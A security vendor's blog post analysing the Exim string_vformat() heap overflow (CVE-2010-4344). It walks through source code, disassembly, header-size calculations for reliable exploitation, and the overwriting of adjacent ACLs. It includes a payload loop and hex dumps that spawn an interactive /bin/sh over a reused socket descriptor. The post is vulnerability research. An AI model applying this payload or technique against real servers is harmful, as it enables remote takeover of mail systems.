VUPEN Vulnerability Research Team (VRT) Blog

 
Technical Analysis of Exim "string_vformat()" Buffer Overflow Vulnerability
 
Published on 2010-12-21 15:16:26 UTC by Matthieu Bonetti, Security Researcher @ VUPEN


Hi everyone,

An interesting vulnerability (CVE-2010-4344) was recently exploited in the wild to remotely and fully compromise systems where the Exim message transfer agent is installed. While the vulnerability itself is simple, creating a reliable code execution exploit involves precise calculations. A reliable exploit was first released by jduck1337, and other, less reliable exploits have since appeared on the web.

In this blog post, we share our binary analysis of the vulnerability and explain how we achieved reliable exploitation.

1. Technical Analysis of the Vulnerability

The vulnerability results from a buffer overflow error within the "string_vformat()" function when processing malformed email messages and headers.

Exim uses various custom functions to handle strings; they can be found in the "exim-4.69/src/string.c" file. One of them is "string_vformat()", which works as follows:

- a pointer "p" is set to buffer
- a pointer "last" is set to buffer + buflen - 1
 
 
BOOL
string_vformat(uschar *buffer, int buflen, char *format, va_list ap)
{
enum { L_NORMAL, L_SHORT, L_LONG, L_LONGLONG, L_LONGDOUBLE };

BOOL yield = TRUE;
int width, precision;
char *fp = format;                             /* Deliberately not unsigned */
uschar *p = buffer;
uschar *last = buffer + buflen - 1;

string_datestamp_offset = -1;              /* Datestamp not inserted */
 

Then, two variables "width" and "precision" are set to -1:

 
item_start = fp;
width = precision = -1;

if (strchr("-+ #0", *(++fp)) != NULL)

 

The supplied argument "format" is then evaluated. If a %s is encountered, the following steps are performed:

- First, the length of the string argument is calculated using "strlen()", independently of buflen
- Then, if both width and precision are negative, they are set to the string length returned by "strlen()"

 
case 'S':                                             /* Forces *lower* case */
s = va_arg(ap, char *);

INSERT_STRING:                                /* Come to from %D above */
if (s == NULL) s = null;
slen = Ustrlen(s);

/* If the width is specified, check that there is a precision
set; if not, set it to the width to prevent overruns of long
strings. */

if (width >= 0)
[...]

else if (precision >= 0)
[...]

else width = precision = slen;

/* Check string space, and add the string to the buffer if ok.

 

If "p" is greater than or equal to "last - width", there is not enough room for the whole string, and both width and precision are recomputed as "last - p - 1".

 
not OK, add part of the string (debugging uses this to show as
much as possible). */

if (p >= last - width)
{
yield = FALSE;
width = precision = last - p - 1;
}
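
The selection and bounds check shown so far can be modelled in a few lines of Python. This is only a simplified sketch, not Exim code: the helper name clamp_for_space is hypothetical, pointers are represented as plain integers, and only the path where neither width nor precision was given in the format string is modelled (the other two branches are elided in the listing above).

```python
def clamp_for_space(p: int, last: int, slen: int):
    """Return (ok, width, precision) as the %s handler would compute them.

    Hypothetical model: p and last are integer addresses, slen is strlen(s).
    """
    width = precision = slen               # neither was given in the format
    ok = True
    if p >= last - width:                  # not enough room for the whole string
        ok = False
        width = precision = last - p - 1   # goes negative once p reaches last
    return ok, width, precision


# Plenty of room: the values are left untouched.
print(clamp_for_space(p=0x1000, last=0x1100, slen=21))
# Some room left: the string is truncated to a non-negative length.
print(clamp_for_space(p=0x1000, last=0x1010, slen=21))
# p has already reached last: the recomputed value is -1.
print(clamp_for_space(p=0x1010, last=0x1010, slen=21))
```

The third call is the interesting one: nothing in the check prevents the recomputed value from dropping below zero.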
 

Once done, width and precision are passed to the "sprintf()" function. The string is copied into the buffer until a NUL byte is encountered or the precision limit is reached.

 
sprintf(CS p, "%*.*s", width, precision, s);
if (fp[-1] == 'S')
while (*p) { *p = tolower(*p); p++; }
else
while (*p) p++;
 

To fully understand the internals of the "string_vformat()" function, let's use it with the following arguments:

         - string_vformat(buffer, 3, "%c %s", ap)

ap is a va_list containing a character and a long string: "looooooooooong buffer" for example.

First, p and last are set:

         - p points to buffer which is at 0x08CCC965 for example
         - last points to 0x08CCC965 + 3 - 1 = 0x08CCC967

Then, "%c" is processed and p advances past the character and the following space:

           p = 0x08CCC965 + 2 = 0x08CCC967

Then width and precision are set to -1.

"%s" is then processed:

         - slen is set to 21 (using strlen()).
         - width and precision are set to 21 as they were negative.

"last" minus the new width is now smaller than p:

          last - width = 0x08CCC967 - 21 = 0x08CCC952
          p = 0x08CCC967 > 0x08CCC952

The variables width and precision are therefore recomputed:

          width = precision = last - p - 1
          width = precision = 0x08CCC967 - 0x08CCC967 - 1
          width = precision = -1

When the "sprintf()" function is called, the long string is copied with a width and a precision of -1 (0xFFFFFFFF). Because the printf family treats a negative precision as if none had been given, the full content of the long string in the va_list is copied despite the size limit of 3.
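
To make the last step concrete, here is a small Python model of how the C printf family renders "%*.*s". It is a sketch under stated assumptions: c_format_s is a hypothetical helper that only mimics the documented C rules (a negative precision argument counts as omitted, a negative width means left-justification in the absolute width), and a run of 21 'A' characters stands in for the long string of the example.

```python
def c_format_s(width: int, precision: int, s: str) -> str:
    """Model how C renders "%*.*s" (simplified, ASCII only).

    A negative precision is treated as if no precision was given;
    a negative width means "left-justify in a field of |width|".
    """
    out = s if precision < 0 else s[:precision]   # precision caps the length
    if width < 0:
        return out.ljust(-width)                  # '-' flag, width = |width|
    return out.rjust(width)                       # default: right-justified


buffer, buflen = 0x08CCC965, 3
s = "A" * 21                      # stand-in for the 21-byte string
last = buffer + buflen - 1        # 0x08CCC967
p = buffer + 2                    # after "%c" and the literal space

width = precision = len(s)        # both were -1, so they take strlen(s)
if p >= last - width:
    width = precision = last - p - 1

written = c_format_s(width, precision, s)
room = last - p                   # bytes still available before "last"
print(width, len(written), room)
```

With a width and precision of -1, the model emits all 21 characters although no room is left before "last".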

This leads to a heap-based buffer overflow. This behavior can be seen from the assembly code as well.

First, p and last are set:

 
.text:080A99E9 mov edx, [ebp+buffer]                         // p
.text:080A99EC mov eax, [ebp+buflen]
.text:080A99EF mov ecx, [ebp+format]
.text:080A99F2 mov string_datestamp_offset, 0FFFFFFFFh
.text:080A99FC mov edi, edx
.text:080A99FE lea eax, [edx+eax-1]
.text:080A9A02 mov [ebp+last], eax                            // last
.text:080A9A05 sub eax, 1
.text:080A9A08 mov [ebp+src], ecx
.text:080A9A0B mov [ebp+yield], 1
.text:080A9A12 mov [ebp+last_minus_one], eax          // last-1, used later
.text:080A9A15 jmp short loc_80A9A2F
 

When %s is handled, the length of the string in the va_list is calculated using "strlen()":

 
.text:080A9DE8 loc_80A9DE8:
.text:080A9DE8 mov [esp], ebx                                  // long string
.text:080A9DEB call _strlen
.text:080A9DF0 mov edx, [ebp+width]
.text:080A9DF3 test edx, edx
.text:080A9DF5 js loc_80A9F30
[...]
.text:080A9F30 loc_80A9F30:
.text:080A9F30 mov edx, [ebp+precision]
.text:080A9F33 test edx, edx
.text:080A9F35 js loc_80AA044
.text:080A9F3B mov ecx, [ebp+precision]
.text:080A9F3E cmp ecx, eax
.text:080A9F40 mov [ebp+width], ecx
.text:080A9F43 jle loc_80A9E06
.text:080A9F49 mov [ebp+width], eax
.text:080A9F4C jmp loc_80A9E06
 

"last - width" is then compared with p. If p is not below it, width and precision are both recomputed as (last - 1) - p.

 
.text:080A9E06 loc_80A9E06:
.text:080A9E06 mov eax, [ebp+last]
.text:080A9E09 sub eax, [ebp+width]
.text:080A9E0C cmp edi, eax
.text:080A9E0E jb short loc_80A9E22
.text:080A9E10 mov eax, [ebp+last_minus_one]
.text:080A9E13 mov [ebp+yield], 0
.text:080A9E1A sub eax, edi
.text:080A9E1C mov [ebp+precision], eax
.text:080A9E1F mov [ebp+width], eax
 

The function "sprintf()" is called with the new width and precision.

 
.text:080A9E22 loc_80A9E22:
.text:080A9E1C mov [ebp+precision], eax
.text:080A9E1F mov [ebp+width], eax
.text:080A9E28 mov [esp+10h], ebx
.text:080A9E2C mov dword ptr [esp+4], offset a_S_0     // "%*.*s"
.text:080A9E34 mov [esp+0Ch], edx
.text:080A9E38 mov [esp+8], ecx
.text:080A9E3C mov [esp], edi
.text:080A9E3F call _sprintf
.text:080A9E44 mov ebx, [ebp+var_24]
.text:080A9E47 cmp byte ptr [ebx], 53h
.text:080A9E4A jnz short loc_80A9E5B
 

As we can see, calling the "string_vformat()" function with an overly long string leads to an exploitable heap overflow condition.
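
The root cause is that the recomputed value has no lower bound. The following sketch shows one possible guard in the same simplified Python model; the function name is hypothetical and we make no claim that this matches the change shipped by the Exim maintainers.

```python
def clamp_for_space_guarded(p: int, last: int, slen: int):
    """Same model as the vulnerable check, with a lower bound of zero.

    Hypothetical sketch: p and last are integer addresses, slen is strlen(s).
    """
    width = precision = slen
    ok = True
    if p >= last - width:
        ok = False
        # Never let the remaining-space computation go below zero, so that
        # "%*.*s" is always called with a real, non-negative limit.
        width = precision = max(0, last - p - 1)
    return ok, width, precision


# p == last: the guarded version yields 0, so no characters are copied.
print(clamp_for_space_guarded(p=0x08CCC967, last=0x08CCC967, slen=21))
```

A precision of 0 makes "%*.*s" copy no characters at all, so the destination is never written past "last".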

To remotely trigger the vulnerability, an attacker can send a malformed email message which will be rejected and logged via the "log_write()" [exim-4.69/src/log.c] function which calls the vulnerable "string_vformat()" function.

2. Attack Vector and Reliable Code Execution

In order to exploit the vulnerability, an attacker has to find a way to reach the "string_vformat()" function with a controlled buflen and input string.

A reliable way is to send an overly large email. When such an email is received, Exim logs the error including various information related to the sender and email headers.

This is done via the "log_write()" function which logs errors this way:

          - First, it allocates a buffer of 0x2000 bytes for the error message
          - Then, it dumps the information related to the sender of the message
          - And then, it dumps each header of the received email using "string_format()"

The "string_format()" function is merely a wrapper around "string_vformat()".

The information related to the sender is formatted the following way:

          - rejected from <attacker@example.com> H=(localhost) [192.168.158.129]: message too big: read=64948256 max=52428800
          - Envelope-from: <attacker@example.com>
          - Envelope-to: <target@target.com>

Each header is dumped separated by two blank spaces. Here is the "log_write()" function in assembly code:

 
.text:0807CC50 log_write proc near
.text:0807CC50
.text:0807CC50 var_9C = dword ptr -9Ch
.text:0807CC50 src = dword ptr -98h
.text:0807CC50 var_94 = dword ptr -94h
.text:0807CC50 n = dword ptr -90h
[...]
.text:0807D6D8 loc_807D6D8:
.text:0807D6D8 mov dword ptr [esp], 2000h
.text:0807D6DF call _malloc                                  // Error message buffer is allocated
.text:0807D6E4 test eax, eax
.text:0807D6E6 mov ds:dword_80F37F0, eax
.text:0807D6EB jnz loc_807CCFE
.text:0807D6F1 mov eax, ds:stderr
[...]
.text:0807CEAA loc_807CEAA:
.text:0807CEAA lea eax, [ebp+arg_C]
.text:0807CEAD mov [esp+0Ch], eax
.text:0807CEB1 mov eax, ds:dword_80F37F0
.text:0807CEB6 mov edi, [ebp+arg_8]
.text:0807CEB9 mov [esp], esi
.text:0807CEBC add eax, 1FFFh
.text:0807CEC1 sub eax, esi
.text:0807CEC3 mov [esp+8], edi
.text:0807CEC7 mov [esp+4], eax
.text:0807CECB call string_vformat                           // Dump "rejected from"
.text:0807CED0 test eax, eax
.text:0807CED2 jnz short loc_807CF2B
.text:0807CED4 mov dword ptr [esi], 2A2A2A2Ah
[...]
.text:0807D74C test ecx, ecx
.text:0807D74E jle loc_807DBF0
.text:0807D754 mov eax, ds:sender_address
.text:0807D759 mov dword ptr [esp+8], offset aEnvelopeFromS  // "Envelope-from: <%s>\n"
.text:0807D761 mov [esp], esi
.text:0807D764 mov [esp+0Ch], eax
.text:0807D768 mov eax, ds:dword_80F37F0                     // Error msg buffer
.text:0807D76D add eax, 2000h
.text:0807D772 sub eax, esi
.text:0807D774 mov [esp+4], eax ; int
.text:0807D778 call string_format
.text:0807D77D cmp byte ptr [esi], 0
.text:0807D780 jz short loc_807D794
.text:0807D782 lea esi, [esi+0]
[...]
.text:0807D799 mov ebx, [ebp+s]
.text:0807D79C mov eax, [eax]
.text:0807D79E mov dword ptr [esp+8], offset aEnvelopeToS    // "Envelope-to: <%s>\n"
.text:0807D7A6 mov [esp], ebx
.text:0807D7A9 mov [esp+0Ch], eax
.text:0807D7AD mov eax, ds:dword_80F37F0                     // Error msg buffer
.text:0807D7B2 add eax, 2000h
.text:0807D7B7 sub eax, ebx
.text:0807D7B9 mov [esp+4], eax
.text:0807D7BD call string_format
.text:0807D7C2 cmp byte ptr [ebx], 0
.text:0807D7C5 jz short loc_807D7D0
[...]
.text:0807D848 loc_807D848:
.text:0807D848 mov eax, [edi+0Ch]
.text:0807D84B test eax, eax
.text:0807D84D jz short loc_807D896
.text:0807D84F mov [esp+10h], eax
.text:0807D853 mov eax, [edi+4]
.text:0807D856 mov dword ptr [esp+8], aCS_1                  // "%c %s"
.text:0807D85E mov [esp], ebx ; s
.text:0807D861 mov [esp+0Ch], eax
.text:0807D865 mov eax, ds:dword_80F37F0                     // Error msg buffer
.text:0807D86A add eax, 2000h
.text:0807D86F sub eax, ebx
.text:0807D871 mov [esp+4], eax ; int
.text:0807D875 call string_format                            // Dump a header
.text:0807D87A cmp byte ptr [ebx], 0
.text:0807D87D jz short loc_807D888
.text:0807D87F nop
[...]
.text:0807D888 loc_807D888:
.text:0807D888 test eax, eax
.text:0807D88A lea esi, [esi+0]
.text:0807D890 jz loc_807DC70
.text:0807D896
.text:0807D896 loc_807D896:
.text:0807D896 mov edi, [edi]                                // Is it the last header?
.text:0807D898 test edi, edi
.text:0807D89A jnz short loc_807D848                         // Process the next header
 

To reliably exploit this vulnerability, an attacker has to fill the 0x2000-byte buffer until exactly 3 bytes are left before the last header is copied into it. This is the key to reliable exploitation: as in the example above, it ensures that "p" and "last" are equal (i.e. pointing to the same address) when "%s" is processed.

Reliability also depends on calculating the exact total size of the headers to be sent. This calculation must take into account several pieces of information, including the size of the "MAIL FROM:" header, the size of the hostnames, the maximum size supported by the server, and other data related to headers and responses.

When the last header is handled, the buffer overflow occurs and the memory after the 0x2000 bytes buffer is overwritten with the content of the last header.
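
Why exactly 3 bytes matter can be checked with a small model of a single "%c %s" call. This is a sketch, not Exim code: the helper names are hypothetical, offsets are relative to the current write pointer, and it assumes (this is not shown in the excerpts above) that the "%c" character and the literal space are each written only while p is below last, with formatting stopping otherwise.

```python
LOG_BUFFER_SIZE = 0x2000  # size of the error-message buffer, from the listing


def remaining_space(bytes_used: int) -> int:
    """Mirror of `add eax, 2000h / sub eax, ebx`: buffer end minus write pointer."""
    return LOG_BUFFER_SIZE - bytes_used


def width_for_header(remaining: int, slen: int):
    """Model one string_format(ptr, remaining, "%c %s", ...) call.

    Returns the width/precision handed to sprintf() for "%s", or None if
    formatting stops before "%s" is reached (assumed behaviour, see lead-in).
    """
    p = 0                          # offset of the write pointer
    last = p + remaining - 1
    for _ in range(2):             # the "%c" character, then the space
        if p >= last:
            return None
        p += 1
    width = slen
    if p >= last - width:
        width = last - p - 1
    return width


for used in (0x1FFE, 0x1FFD, 0x1FFC, 0x1000):
    left = remaining_space(used)
    print(left, width_for_header(left, slen=200))
```

In this model only the case with 3 bytes left produces a negative width: with fewer bytes the "%s" conversion is never reached, and with more bytes the value stays non-negative and the copy is truncated as intended.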

A few bytes after the 0x2000 bytes buffer, we can find some ACLs:

          - At 0x09C1C92E is the penultimate header
          - At 0x09C1CA0E are the ACLs

 
09C1C91E 41 41 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 AAAAAAAA. 00000
09C1C92E 30 30 30 36 32 3A 20 41 41 41 41 41 41 41 41 41 00062: AAAAAAAAA
09C1C93E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C94E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C95E 41 41 41 41 41 41 0A 00 00 00 00 00 00 00 09 40 AAAAAA.........@
09C1C96E 00 00 61 40 61 2E 63 6F 6D 00 72 20 6D 65 73 73 ..a@a.com.r mess
09C1C97E 61 67 65 2C 20 65 6E 64 69 6E 67 20 77 69 74 68 age, ending with
09C1C98E 20 22 2E 22 20 6F 6E 20 61 20 6C 69 6E 65 20 62 "." on a line b
09C1C99E 79 20 69 74 73 65 6C 66 0D 0A 00 39 3A 34 37 3A y itself...9:47:
09C1C9AE 31 39 20 2D 30 35 30 30 0D 0A 00 75 65 7D 66 61 19 -0500...ue}fa
09C1C9BE 69 6C 7D 7D 7B 5C 5C 4E 5B 5C 5C 5E 5D 5C 5C 4E il}}{\\N[\\^]\\N
09C1C9CE 7D 7B 5E 5E 7D 7D 7D 7B 5C 5C 4E 28 5B 5E 3A 5D }{^^}}}{\\N([^:]
09C1C9DE 2B 3A 29 28 2E 2A 29 5C 5C 4E 7D 7B 5C 5C 24 32 +:)(.*)\\N}{\\$2
09C1C9EE 7D 7D 22 0A 00 5C 5C 5E 5D 5C 5C 4E 7D 7B 5E 5E }}"..\\^]\\N}{^^
09C1C9FE 7D 7D 7D 7B 7D 7D 7D 7B 7D 66 61 69 6C 7D 3B 20 }}}{}}}{}fail};
09C1CA0E 24 7B 65 78 74 72 61 63 74 7B 31 7D 7B 3A 3A 7D ${extract{1}{::}
09C1CA1E 7B 24 7B 73 67 7B 24 7B 6C 6F 6F 6B 75 70 7B 24 {${sg{${lookup{$
09C1CA2E 68 6F 73 74 7D 6E 77 69 6C 64 6C 73 65 61 72 63 host}nwildlsearc
09C1CA3E 68 7B 2F 65 74 63 2F 65 78 69 6D 34 2F 70 61 73 h{/etc/exim4/pas

 

ACLs are used, for instance, when evaluating the sender's address. Within an ACL, it is possible to execute a command with an expansion such as: ${run{command}}

On Linux, when a process forks, its open file descriptors are inherited by the child process. Therefore, when the ACL command is executed, the socket file descriptor can be reused by the child. Its number is not known in advance, but it is easy to brute force and to use as stdin.

 
cmd = ""  # accumulates one ${run{...}} expansion per candidate descriptor
for fd in range(3, 20):
    cmd += "${{run{{/bin/sh -c 'exec /bin/sh -i <&{0} >&0 2>&0'}}}} ".format(fd)
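
The descriptor inheritance described above is generic UNIX behaviour and can be observed with a small, self-contained sketch. It is unrelated to Exim itself: a pipe stands in for the SMTP socket, the function name is hypothetical, and the code requires a POSIX system where os.fork() is available.

```python
import os


def child_writes_to_inherited_fd(message: bytes) -> bytes:
    """Fork a child that uses a descriptor opened by the parent.

    The child never opens anything itself: it writes to the pipe's write
    end purely through the descriptor number it inherited.
    """
    read_fd, write_fd = os.pipe()
    pid = os.fork()
    if pid == 0:                       # child process
        os.close(read_fd)
        os.write(write_fd, message)    # same fd number as in the parent
        os._exit(0)
    os.close(write_fd)                 # parent keeps only the read end
    data = os.read(read_fd, len(message))
    os.close(read_fd)
    os.waitpid(pid, 0)
    return data


if __name__ == "__main__":
    print(child_writes_to_inherited_fd(b"inherited"))
```

The child only needs the descriptor number, which is why trying a small range of numbers is enough when the exact value is unknown.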

 

After the overflow, the ACLs are overwritten:

         - At 0x09C1C92E is the penultimate header
         - At 0x09C1C95E is the last header
         - At 0x09C1CA0E are the overwritten ACLs

 
09C1C91E 41 41 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 AAAAAAAA. 00000
09C1C92E 30 30 30 36 32 3A 20 41 41 41 41 41 41 41 41 41 00062: AAAAAAAAA
09C1C93E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C94E 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
09C1C95E 41 41 41 41 41 41 0A 20 20 30 30 30 30 30 30 30 AAAAAA. 0000000
09C1C96E 30 36 33 3A 20 24 7B 72 75 6E 7B 2F 62 69 6E 2F 063: ${run{/bin/
09C1C97E 73 68 20 2D 63 20 27 65 78 65 63 20 2F 62 69 6E sh -c 'exec /bin
09C1C98E 2F 73 68 20 2D 69 20 3C 26 33 20 3E 26 30 20 32 /sh -i <&3 >&0 2
09C1C99E 3E 26 30 27 7D 7D 20 24 7B 72 75 6E 7B 2F 62 69 >&0'}} ${run{/bi
09C1C9AE 6E 2F 73 68 20 2D 63 20 27 65 78 65 63 20 2F 62 n/sh -c 'exec /b
09C1C9BE 69 6E 2F 73 68 20 2D 69 20 3C 26 34 20 3E 26 30 in/sh -i <&4 >&0
09C1C9CE 20 32 3E 26 30 27 7D 7D 20 24 7B 72 75 6E 7B 2F 2>&0'}} ${run{/
09C1C9DE 62 69 6E 2F 73 68 20 2D 63 20 27 65 78 65 63 20 bin/sh -c 'exec_
09C1C9EE 2F 62 69 6E 2F 73 68 20 2D 69 20 3C 26 35 20 3E /bin/sh -i <&5 >
09C1C9FE 26 30 20 32 3E 26 30 27 7D 7D 20 24 7B 72 75 6E &0 2>&0'}} ${run
09C1CA0E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20 27 65 78 65 {/bin/sh -c 'exe
09C1CA1E 63 20 2F 62 69 6E 2F 73 68 20 2D 69 20 3C 26 36 c /bin/sh -i <&6
09C1CA2E 20 3E 26 30 20 32 3E 26 30 27 7D 7D 20 24 7B 72 >&0 2>&0'}} ${r
09C1CA3E 75 6E 7B 2F 62 69 6E 2F 73 68 20 2D 63 20 27 65 un{/bin/sh -c 'e

 

In order to trigger the ACL, a second email is sent to the server using the same established connection, which leads to arbitrary code execution with Exim privileges.

If combined with a privilege escalation vulnerability (e.g. CVE-2010-4345), this flaw could be remotely exploited to execute arbitrary code with root privileges.

Our code execution exploit has been released through the VUPEN Binary Analysis & Exploits Service and was tested with Debian and Ubuntu.

© Copyright VUPEN Security

 
